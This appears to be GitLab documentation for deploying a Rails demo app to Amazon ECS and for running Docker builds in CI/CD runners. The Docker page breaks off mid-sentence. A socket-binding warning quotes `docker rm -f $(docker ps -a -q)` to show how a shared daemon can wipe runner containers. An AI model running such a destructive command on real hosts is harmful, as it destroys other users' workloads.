`aws` CLI. | | `AWS_DEFAULT_REGION` | `us-east-2` | For authenticating `aws` CLI. | | `CI_AWS_ECS_CLUSTER` | `ecs-demo` | The ECS cluster is accessed by `production_ecs` job. | | `CI_AWS_ECS_SERVICE` | `ecs_demo` | The ECS service of the cluster is updated by `production_ecs` job. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). | | `CI_AWS_ECS_TASK_DEFINITION` | `ecs_demo` | The ECS task definition is updated by `production_ecs` job. | ### Make a change to the demo application Change a file in the project and see if it's reflected in the demo application on ECS: 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Open the `app/views/welcome/index.html.erb` file. 1. Select **Edit**. 1. Change the text to `You're on ECS!`. 1. Select **Commit Changes**. This automatically triggers a new pipeline. Wait until it finishes. 1. [Access the running application on the ECS cluster](#view-the-demo-application). You should see this: ![Application running on ECS with a confirmation message.](img/view-running-app-2_v13_10.png) Congratulations! You successfully set up continuous deployment to ECS. {{< alert type="note" >}} ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value. {{< /alert >}} ## Set up review apps To use review apps with ECS: 1. Set up a new [service](#create-an-ecs-service). 1. Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the environment scope to `review/*`. Only one Review App at a time can be deployed because this service is shared by all review apps. ## Set up Security Testing ### Configure SAST To use [SAST](../../../user/application_security/sast/_index.md) with ECS, add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` For more details and configuration options, see the [SAST documentation](../../../user/application_security/sast/_index.md#configuration). ### Configure DAST To use [DAST](../../../user/application_security/dast/_index.md) on non-default branches, [set up review apps](#set-up-review-apps) and add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml ``` To use DAST on the default branch: 1. Set up a new [service](#create-an-ecs-service). This service will be used to deploy a temporary DAST environment. 1. Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the scope to the `dast-default` environment. 1. Add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml - template: Jobs/DAST-Default-Branch-Deploy.gitlab-ci.yml ``` For more details and configuration options, see the [DAST documentation](../../../user/application_security/dast/_index.md). ## Further reading - If you're interested in more of the continuous deployments to clouds, see [cloud deployments](../_index.md). - If you want to quickly set up DevSecOps in your project, see [Auto DevOps](../../../topics/autodevops/_index.md). - If you want to quickly set up the production-grade environment, see [the 5 Minute Production App](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template/-/blob/master/README.md).
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Deploy to Amazon Elastic Container Service breadcrumbs: - doc - ci - cloud_deployment - ecs --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This step-by-step guide helps you deploy a project hosted on GitLab.com to the Amazon [Elastic Container Service (ECS)](https://aws.amazon.com/ecs/). In this guide, you begin by creating an ECS cluster manually using the AWS console. You create and deploy a simple application that you create from a GitLab template. These instructions work for both GitLab.com and GitLab Self-Managed instances. Ensure your own [runners are configured](../../runners/_index.md). ## Prerequisites - An [AWS account](https://repost.aws/knowledge-center/create-and-activate-aws-account). Sign in with an existing AWS account or create a new one. - In this guide, you create an infrastructure in [`us-east-2` region](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html). You can use any region, but do not change it after you begin. ## Create an infrastructure and initial deployment on AWS For deploying an application from GitLab, you must first create an infrastructure and initial deployment on AWS. This includes an [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) and related components, such as [ECS task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html), [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html), and containerized application image. For the first step here, you create a demo application from a project template. ### Create a new project from a template Use a GitLab project template to get started. As the name suggests, these projects provide a bare-bones application built on some well-known frameworks. 1. In GitLab on the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Create from template**, where you can choose from a Ruby on Rails, Spring, or NodeJS Express project. For this guide, use the Ruby on Rails template. 1. Give your project a name. In this example, it's named `ecs-demo`. Make it public so that you can take advantage of the features available in the [GitLab Ultimate plan](https://about.gitlab.com/pricing/). 1. Select **Create project**. Now that you created a demo project, you must containerize the application and push it to the container registry. ### Push a containerized application image to GitLab container registry [ECS](https://aws.amazon.com/ecs/) is a container orchestration service, meaning that you must provide a containerized application image during the infrastructure build. To do so, you can use GitLab [Auto Build](../../../topics/autodevops/stages.md#auto-build) and [Container Registry](../../../user/packages/container_registry/_index.md). 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Select **Set up CI/CD**. It brings you to a `.gitlab-ci.yml` creation form. 1. Copy and paste the following content into the empty `.gitlab-ci.yml`. This defines a pipeline for continuous deployment to ECS. ```yaml include: - template: AWS/Deploy-ECS.gitlab-ci.yml ``` 1. Select **Commit Changes**. It automatically triggers a new pipeline. In this pipeline, the `build` job containerizes the application and pushes the image to [GitLab container registry](../../../user/packages/container_registry/_index.md). 1. Visit **Deploy > Container Registry**. Make sure the application image has been pushed. ![A containerized application image in the GitLab container registry.](img/registry_v13_10.png) Now you have a containerized application image that can be pulled from AWS. Next, you define the spec of how this application image is used in AWS. The `production_ecs` job fails because ECS Cluster is not connected yet. You can fix this later. ### Create an ECS task definition [ECS Task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html) is a specification about how the application image is started by an [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). 1. Go to **ECS > Task Definitions** on [AWS console](https://aws.amazon.com/). 1. Select **Create new Task Definition**. ![Task definitions page with a 'Create new task definition' button.](img/ecs-task-definitions_v13_10.png) 1. Choose **EC2** as the launch type. Select **Next Step**. 1. Set `ecs_demo` to **Task Definition Name**. 1. Set `512` to **Task Size > Task memory** and **Task CPU**. 1. Select **Container Definitions > Add container**. This opens a container registration form. 1. Set `web` to **Container name**. 1. Set `registry.gitlab.com/<your-namespace>/ecs-demo/master:latest` to **Image**. Alternatively, you can copy and paste the image path from the [GitLab container registry page](#push-a-containerized-application-image-to-gitlab-container-registry). ![Container name and image fields completed.](img/container-name_v13_10.png) 1. Add a port mapping. Set `80` to **Host Port** and `5000` to **Container port**. ![Port mappings fields completed.](img/container-port-mapping_v13_10.png) 1. Select **Create**. Now you have the initial task definition. Next, you create an actual infrastructure to run the application image. ### Create an ECS cluster An [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) is a virtual group of [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). It's also associated with EC2 or Fargate as the computation resource. 1. Go to **ECS > Clusters** on [AWS console](https://aws.amazon.com/). 1. Select **Create Cluster**. 1. Select **EC2 Linux + Networking** as the cluster template. Select **Next Step**. 1. Set `ecs-demo` to **Cluster Name**. 1. Choose the default [VPC](https://aws.amazon.com/vpc/?vpc-blogs.sort-by=item.additionalFields.createdDate&vpc-blogs.sort-order=desc) in **Networking**. If there are no existing VPCs, you can leave it as-is to create a new one. 1. Set all available subnets of the VPC to **Subnets**. 1. Select **Create**. 1. Make sure that the ECS cluster has been successfully created. ![ECS cluster created successfully with all instances running.](img/ecs-launch-status_v13_10.png) Now you can register an ECS service to the ECS cluster in the next step. Note the following: - Optionally, you can set a SSH key pair in the creation form. This allows you to SSH to the EC2 instance for debugging. - If you don't choose an existing VPC, it creates a new VPC by default. This could cause an error if it reaches the maximum allowed number of internet gateways on your account. - The cluster requires an EC2 instance, meaning it costs you [according to the instance-type](https://aws.amazon.com/ec2/pricing/on-demand/). ### Create an ECS Service [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html) is a daemon to create an application container based on the [ECS task definition](#create-an-ecs-task-definition). 1. Go to **ECS > Clusters > ecs-demo > Services** on the [AWS console](https://aws.amazon.com/) 1. Select **Deploy**. This opens a service creation form. 1. Select `EC2` in **Launch Type**. 1. Set `ecs_demo` to **Task definition**. This corresponds to [the task definition you created previously](#create-an-ecs-task-definition). 1. Set `ecs_demo` to **Service name**. 1. Set `1` to **Desired tasks**. ![Services page with all inputs completed.](img/service-parameter_v13_10.png) 1. Select **Deploy**. 1. Make sure that the created service is active. ![An active service running with tasks.](img/service-running_v13_10.png) The AWS console UI changes from time to time. If you can't find a relevant component in the instructions, select the closest one. ### View the demo application Now, the demo application is accessible from the internet. 1. Go to **EC2 > Instances** on the [AWS console](https://aws.amazon.com/) 1. Search by `ECS Instance` to find the corresponding EC2 instance that [the ECS cluster created](#create-an-ecs-cluster). 1. Select the ID of the EC2 instance. This brings you to the instance detail page. 1. Copy **Public IPv4 address** and paste it in the browser. Now you can see the demo application running. ![The demo application running in a browser.](img/view-running-app_v13_10.png) In this guide, HTTPS/SSL is **not** configured. You can access to the application through HTTP only (for example, `http://<ec2-ipv4-address>`). ## Set up Continuous Deployment from GitLab Now that you have an application running on ECS, you can set up continuous deployment from GitLab. ### Create a new IAM user as a deployer For GitLab to access the ECS cluster, service, and task definition that you previously created, you must create a deployer user on AWS: 1. Go to **IAM > Users** on [AWS console](https://aws.amazon.com/). 1. Select **Add user**. 1. Set `ecs_demo` to **User name**. 1. Enable **Programmatic access** checkbox. Select **Next: Permissions**. 1. Select `Attach existing policies directly` in **Set permissions**. 1. Select `AmazonECS_FullAccess` from the policy list. Select **Next: Tags** and **Next: Review**. ![A selected `AmazonECS_FullAccess` policy.](img/ecs-policy_v13_10.png) 1. Select **Create user**. 1. Take note of the **Access key ID** and **Secret access key** of the created user. {{< alert type="note" >}} Do not share the secret access key in a public place. You must save it in a secure place. {{< /alert >}} ### Setup credentials in GitLab to let pipeline jobs access to ECS You can register the access information in [GitLab CI/CD Variables](../../variables/_index.md). These variables are injected into the pipeline jobs and can access the ECS API. 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Go to **Settings > CI/CD > Variables**. 1. Select **Add Variable** and set the following key-value pairs. | Key | Value | Note | |------------------------------|---------------------------------------|------| | `AWS_ACCESS_KEY_ID` | `<Access key ID of the deployer>` | For authenticating `aws` CLI. | | `AWS_SECRET_ACCESS_KEY` | `<Secret access key of the deployer>` | For authenticating `aws` CLI. | | `AWS_DEFAULT_REGION` | `us-east-2` | For authenticating `aws` CLI. | | `CI_AWS_ECS_CLUSTER` | `ecs-demo` | The ECS cluster is accessed by `production_ecs` job. | | `CI_AWS_ECS_SERVICE` | `ecs_demo` | The ECS service of the cluster is updated by `production_ecs` job. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). | | `CI_AWS_ECS_TASK_DEFINITION` | `ecs_demo` | The ECS task definition is updated by `production_ecs` job. | ### Make a change to the demo application Change a file in the project and see if it's reflected in the demo application on ECS: 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Open the `app/views/welcome/index.html.erb` file. 1. Select **Edit**. 1. Change the text to `You're on ECS!`. 1. Select **Commit Changes**. This automatically triggers a new pipeline. Wait until it finishes. 1. [Access the running application on the ECS cluster](#view-the-demo-application). You should see this: ![Application running on ECS with a confirmation message.](img/view-running-app-2_v13_10.png) Congratulations! You successfully set up continuous deployment to ECS. {{< alert type="note" >}} ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value. {{< /alert >}} ## Set up review apps To use review apps with ECS: 1. Set up a new [service](#create-an-ecs-service). 1. Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the environment scope to `review/*`. Only one Review App at a time can be deployed because this service is shared by all review apps. ## Set up Security Testing ### Configure SAST To use [SAST](../../../user/application_security/sast/_index.md) with ECS, add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` For more details and configuration options, see the [SAST documentation](../../../user/application_security/sast/_index.md#configuration). ### Configure DAST To use [DAST](../../../user/application_security/dast/_index.md) on non-default branches, [set up review apps](#set-up-review-apps) and add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml ``` To use DAST on the default branch: 1. Set up a new [service](#create-an-ecs-service). This service will be used to deploy a temporary DAST environment. 1. Use the `CI_AWS_ECS_SERVICE` variable to set the name. 1. Set the scope to the `dast-default` environment. 1. Add the following to your `.gitlab-ci.yml` file: ```yaml include: - template: Security/DAST.gitlab-ci.yml - template: Jobs/DAST-Default-Branch-Deploy.gitlab-ci.yml ``` For more details and configuration options, see the [DAST documentation](../../../user/application_security/dast/_index.md). ## Further reading - If you're interested in more of the continuous deployments to clouds, see [cloud deployments](../_index.md). - If you want to quickly set up DevSecOps in your project, see [Auto DevOps](../../../topics/autodevops/_index.md). - If you want to quickly set up the production-grade environment, see [the 5 Minute Production App](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template/-/blob/master/README.md).
https://docs.gitlab.com/ci/using_docker_build
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_docker_build.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
using_docker_build.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use Docker to build Docker images
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can use GitLab CI/CD with Docker to create Docker images. For example, you can create a Docker image of your application, test it, and push it to a container registry. To run Docker commands in your CI/CD jobs, you must configure GitLab Runner to support `docker` commands. This method requires `privileged` mode. If you want to build Docker images without enabling `privileged` mode on the runner, you can use a [Docker alternative](#docker-alternatives). ## Enable Docker commands in your CI/CD jobs To enable Docker commands for your CI/CD jobs, you can use: - [The shell executor](#use-the-shell-executor) - [Docker-in-Docker](#use-docker-in-docker) - [Docker socket binding](#use-docker-socket-binding) - [Docker pipe binding](#use-docker-pipe-binding) ### Use the shell executor To include Docker commands in your CI/CD jobs, you can configure your runner to use the `shell` executor. In this configuration, the `gitlab-runner` user runs the Docker commands, but needs permission to do so. 1. [Install](https://gitlab.com/gitlab-org/gitlab-runner/#installation) GitLab Runner. 1. [Register](https://docs.gitlab.com/runner/register/) a runner. Select the `shell` executor. For example: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor shell \ --description "My Runner" ``` 1. On the server where GitLab Runner is installed, install Docker Engine. View a list of [supported platforms](https://docs.docker.com/engine/install/). 1. Add the `gitlab-runner` user to the `docker` group: ```shell sudo usermod -aG docker gitlab-runner ``` 1. Verify that `gitlab-runner` has access to Docker: ```shell sudo -u gitlab-runner -H docker info ``` 1. In GitLab, add `docker info` to `.gitlab-ci.yml` to verify that Docker is working: ```yaml default: before_script: - docker info build_image: script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` You can now use `docker` commands (and install Docker Compose if needed). When you add `gitlab-runner` to the `docker` group, you effectively grant `gitlab-runner` full root permissions. For more information, see [security of the `docker` group](https://blog.zopyx.com/on-docker-security-docker-group-considered-harmful/). ### Use Docker-in-Docker "Docker-in-Docker" (`dind`) means: - Your registered runner uses the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) or the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/). - The executor uses a [container image of Docker](https://hub.docker.com/_/docker/), provided by Docker, to run your CI/CD jobs. The Docker image includes all of the `docker` tools and can run the job script in context of the image in privileged mode. You should use Docker-in-Docker with TLS enabled, which is supported by [GitLab.com instance runners](../runners/_index.md). You should always pin a specific version of the image, like `docker:24.0.5`. If you use a tag like `docker:latest`, you have no control over which version is used. This can cause incompatibility problems when new versions are released. #### Use the Docker executor with Docker-in-Docker You can use the Docker executor to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in the Docker executor The Docker daemon supports connections over TLS. TLS is the default in Docker 19.03.12 and later. {{< alert type="warning" >}} This task enables `--docker-privileged`, which effectively disables the container's security mechanisms and exposes your host to privilege escalation. This action can cause container breakout. For more information, see [runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities). {{< /alert >}} To use Docker-in-Docker with TLS enabled: 1. Install [GitLab Runner](https://docs.gitlab.com/runner/install/). 1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged \ --docker-volumes "/certs/client" ``` - This command registers a new runner to use the `docker:24.0.5` image (if none is specified at the job level). To start the build and service containers, it uses the `privileged` mode. If you want to use Docker-in-Docker, you must always use `privileged = true` in your Docker containers. - This command mounts `/certs/client` for the service and build container, which is needed for the Docker client to use the certificates in that directory. For more information, see [the Docker image documentation](https://hub.docker.com/_/docker/). The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/certs/client", "/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When you use the dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. Docker 19.03 does this automatically # by setting the DOCKER_HOST in # https://github.com/docker-library/docker/blob/d45051476babc297257df490d22cbd806f1b11e4/19.03/docker-entrypoint.sh#L23-L29 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" build: stage: build tags: - tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Use a Unix socket on a shared volume between Docker-in-Docker and build container Directories defined in `volumes = ["/certs/client", "/cache"]` in the [Docker-in-Docker with TLS enabled in the Docker executor](#docker-in-docker-with-tls-enabled-in-the-docker-executor) approach are [persistent between builds](https://docs.gitlab.com/runner/executors/docker.html#persistent-storage). If multiple CI/CD jobs using a Docker executor runner have Docker-in-Docker services enabled, then each job writes to the directory path. This approach might result in a conflict. To address this conflict, use a Unix socket on a volume shared between the Docker-in-Docker service and the build container. This approach improves performance and establishes a secure connection between the service and client. The following is a sample `config.toml` with temporary volume shared between build and service containers: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] image = "docker:24.0.5" privileged = true volumes = ["/runner/services/docker"] # Temporary volume shared between build and service containers. ``` The Docker-in-Docker service creates a `docker.sock`. The Docker client connects to `docker.sock` through a Docker Unix socket volume. ```yaml job: variables: # This variable is shared by both the DinD service and Docker client. # For the service, it will instruct DinD to create `docker.sock` here. # For the client, it tells the Docker client which Docker Unix socket to connect to. DOCKER_HOST: "unix:///runner/services/docker/docker.sock" services: - docker:24.0.5-dind image: docker:24.0.5 script: - docker version ``` ##### Docker-in-Docker with TLS disabled in the Docker executor Sometimes there are legitimate reasons to disable TLS. For example, you have no control over the GitLab Runner configuration that you are using. 1. Register GitLab Runner from command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "no-tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Include the `docker:24.0.5-dind` service in the job script: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When using dind service, you must instruct docker to talk with the # daemon started inside of the service. The daemon is available with # a network connection instead of the default /var/run/docker.sock socket. # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#accessing-the-services # DOCKER_HOST: tcp://docker:2375 # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with proxy enabled in the Docker executor You might need to configure proxy settings to use the `docker push` command. For more information, see [Proxy settings when using dind service](https://docs.gitlab.com/runner/configuration/proxy.html#proxy-settings-when-using-dind-service). #### Use the Kubernetes executor with Docker-in-Docker You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/) to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in Kubernetes To use Docker-in-Docker with TLS enabled in Kubernetes: 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) to specify a volume mount. ```yaml runners: tags: "tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true [[runners.kubernetes.volumes.empty_dir]] name = "docker-certs" mount_path = "/certs/client" medium = "Memory" ``` 1. Include the `docker:24.0.5-dind` service in the job: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2376" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2376 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" # These are usually specified by the entrypoint, however the # Kubernetes executor doesn't run entrypoints # https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4125 DOCKER_TLS_VERIFY: 1 DOCKER_CERT_PATH: "$DOCKER_TLS_CERTDIR/client" build: stage: build tags: - tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with TLS disabled in Kubernetes To use Docker-in-Docker with TLS disabled in Kubernetes, you must adapt the previous example to: - Remove the `[[runners.kubernetes.volumes.empty_dir]]` section from the `values.yml` file. - Change the port from `2376` to `2375` with `DOCKER_HOST: tcp://docker:2375`. - Instruct Docker to start with TLS disabled with `DOCKER_TLS_CERTDIR: ""`. For example: 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137): ```yaml runners: tags: "no-tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true ``` 1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2375" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2375 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker-in-Docker Docker-in-Docker is the recommended configuration, but you should be aware of the following issues: - **The `docker-compose` command**: This command is not available in this configuration by default. To use `docker-compose` in your job scripts, follow the Docker Compose [installation instructions](https://docs.docker.com/compose/install/). - **Cache**: Each job runs in a new environment. Because every build gets its own instance of the Docker engine, concurrent jobs do not cause conflicts. However, jobs can be slower because there's no caching of layers. See [Docker layer caching](#make-docker-in-docker-builds-faster-with-docker-layer-caching). - **Storage drivers**: By default, earlier versions of Docker use the `vfs` storage driver, which copies the file system for each job. Docker 17.09 and later use `--storage-driver overlay2`, which is the recommended storage driver. See [Using the OverlayFS driver](#use-the-overlayfs-driver) for details. - **Root file system**: Because the `docker:24.0.5-dind` container and the runner container do not share their root file system, you can use the job's working directory as a mount point for child containers. For example, if you have files you want to share with a child container, you could create a subdirectory under `/builds/$CI_PROJECT_PATH` and use it as your mount point. For a more detailed explanation, see [issue #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227). ```yaml variables: MOUNT_POINT: /builds/$CI_PROJECT_PATH/mnt script: - mkdir -p "$MOUNT_POINT" - docker run -v "$MOUNT_POINT:/mnt" my-docker-image ``` ### Use Docker socket binding To use Docker commands in your CI/CD jobs, you can bind-mount `/var/run/docker.sock` into the build container. Docker is then available in the context of the image. If you bind the Docker socket you can't use `docker:24.0.5-dind` as a service. Volume bindings also affect services, making them incompatible. #### Use the Docker executor with Docker socket binding To mount the Docker socket with the Docker executor, add `"/var/run/docker.sock:/var/run/docker.sock"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 1. To mount `/var/run/docker.sock` while registering your runner, include the following options: ```shell sudo gitlab-runner register \ --non-interactive \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor "docker" \ --description "docker-runner" \ --tag-list "socket-binding-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-volumes "/var/run/docker.sock:/var/run/docker.sock" ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = RUNNER_TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = false disable_cache = false volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"] [runners.cache] Insecure = false ``` 1. Use Docker in the job script: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build tags: - socket-binding-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Use the Kubernetes executor with Docker socket binding To mount the Docker socket with the Kubernetes executor, add `"/var/run/docker.sock"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume). 1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html). ```yaml runners: tags: "socket-binding-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = false [runners.kubernetes] [[runners.kubernetes.volumes.host_path]] host_path = '/var/run/docker.sock' mount_path = '/var/run/docker.sock' name = 'docker-sock' read_only = true ``` 1. Use Docker in the job script: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build tags: - socket-binding-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker socket binding When you use Docker socket binding, you avoid running Docker in privileged mode. However, the implications of this method are: - When you share the Docker daemon, you effectively disable the container's security mechanisms and expose your host to privilege escalation. This can cause container breakout. For example, if you run `docker rm -f $(docker ps -a -q)` in a project, it removes the GitLab Runner containers. - Concurrent jobs might not work. If your tests create containers with specific names, they might conflict with each other. - Any containers created by Docker commands are siblings of the runner, rather than children of the runner. This might cause complications for your workflow. - Sharing files and directories from the source repository into containers might not work as expected. Volume mounting is done in the context of the host machine, not the build container. For example: ```shell docker run --rm -t -i -v $(pwd)/src:/home/app/src test-image:latest run_app_tests ``` You do not need to include the `docker:24.0.5-dind` service, like you do when you use the Docker-in-Docker executor: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` For complex Docker-in-Docker setups like [Code Quality scanning using CodeClimate](../testing/code_quality_codeclimate_scanning.md), you must match host and container paths for proper execution. For more details, see [Use private runners for CodeClimate-based scanning](../testing/code_quality_codeclimate_scanning.md#use-private-runners). ### Use Docker pipe binding Windows Containers run Windows executables compiled for the Windows Server kernel and userland (either windowsservercore or nanoserver). To build and run Windows containers, a Windows system with container support is required. For more information, see [Windows Containers](https://learn.microsoft.com/en-us/virtualization/windowscontainers/). To use Docker pipe binding, you must install and run a Docker Engine on the host Windows Server operating system. For more information, see [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1). To use Docker commands in your Windows-based container CI/CD jobs, you can bind-mount `\\.\pipe\docker_engine` into the launched executor container. Docker is then available in the context of the image. The [Docker pipe binding in Windows](#use-docker-pipe-binding) is similar to [Docker socket binding in Linux](#use-docker-socket-binding) and have similar [Known issues](#known-issues-with-docker-pipe-binding) as [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). A mandatory prerequisite for usage of Docker pipe binding is a Docker Engine installed and running on the host Windows Server operating system. See: [Install Docker Community Edition (CE) on Windows 